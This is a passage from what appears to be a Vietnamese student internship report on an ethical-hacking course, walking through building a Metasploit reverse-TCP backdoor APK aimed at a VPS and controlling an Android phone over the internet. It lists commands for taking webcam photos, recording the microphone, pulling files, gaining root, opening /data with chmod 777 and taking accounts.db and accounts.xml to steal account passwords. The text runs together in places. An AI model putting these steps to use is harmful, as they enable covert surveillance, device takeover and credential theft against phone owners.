Lấy file từ sd cardĐể vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục




Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard







Dùng lệnh cd /sdcard/Download để vào thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali




II. THỰCHIỆN TRÊNMÔI TRƯỜNG INTERNET

1.TRIỂN KHAI LÊN VPS

1.1 Cài đặt Metasploit lên VPS

1. Giới thiệu

Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấncông và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đốitượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.

2. Cài đặt

Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn

phiên bản Community miễn phí và dùng cho nghiên cứu.




Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềmkhác.




Chọn folder cài đặt:

Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:




Chọn server và ngày hết hạn, để mặc định:

Quá trình cài đặt của Metasploit:




Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:




Sau khi Finish trình duyệt web mở lên và đi tới giao diện




Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vàoMetasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọnCreate Account:

Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễnphí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:




2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET

Các bước thực hiện

1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Androidnhư trên mang Lan với địa chỉ IP là địa chỉ của VPS

Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp

lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ

VPS là 14.0.21.132

2. Khởi động Metasploit Console trên VPS




3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đâychỉ khác là sử dụng chính IP của VPS

4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack




5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ




Để xem các lệnh ta gõ helpĐể xem thông tin về máy, nhập lệnh SysInfoĐể xem các tác vụ đang chạy gõ psXem ip gõ ipconfigXem danh sách thư mục, file gõ ls

Sử dụng camera:Để xem danh sách camera, nhập webcam_listĐể chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ởdanh sách camera ở phần trước.

Ghi âmĐể thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Lấy file từ sd card




Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Dùng lệnh cd /sdcard/Download để vào thư mụcĐể tải về máy, ta nhập lệnhDownload App.apkđể upload gõ lệnh uploadVà file này sẽ được tải về thư mục root của máy KaliGõ shell để vào lệnhkiểm tra xem có root chưa gõsuwhoamiNếu báo unknown id is 0 tức là đã rootls -l danh mục file và các quyềncd để chuyển hướng thư mụcĐể ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền/DATA/DATA/APP/DATA/SYSTEM/DATA/SYSTEM/accounts.db/DATA/SYSTEM/SYNC/accounts.xml/SYSTEM/APP/để xem danh sách và down load các file hay thay đổi các file trong ROMđầu tiên phải gõ lệnh SU để có toàn quyền truy cậpđể có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filenameVí dụ chmod -R 777 /data^C để quay lạiSử dụng SQLite để mở file db




KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP

Những kiến thức lý thuyết đã được củng cố:

Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android Tìm hiểu về hệ điều hành Kali Linux Tìm hiểu về các lỗ hổng bảo mật của Windows và Android Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng

Những kỹ năng thực hành đã được học thêm:

Thực hiện cài đặt Android trên máy ảo Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows vàAndroid

Thi lấy chứng chỉ System Hacking của trung tâm Athena Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android Biết thêm về một số bài học trong lớp Hacker mũ trắng

Những kinh nghiệm thực tiễn đã tích lũy được:

Qua gần 3 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứnhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bêncạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanhnghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thôngqua các kĩ năng giao tiếp và ứng xử.

Documents

Báo Cáo Thực Tập - i.vietnamdoc.neti.vietnamdoc.net/data/file/2015/Thang01/31/Nghien... · >=6 , - . $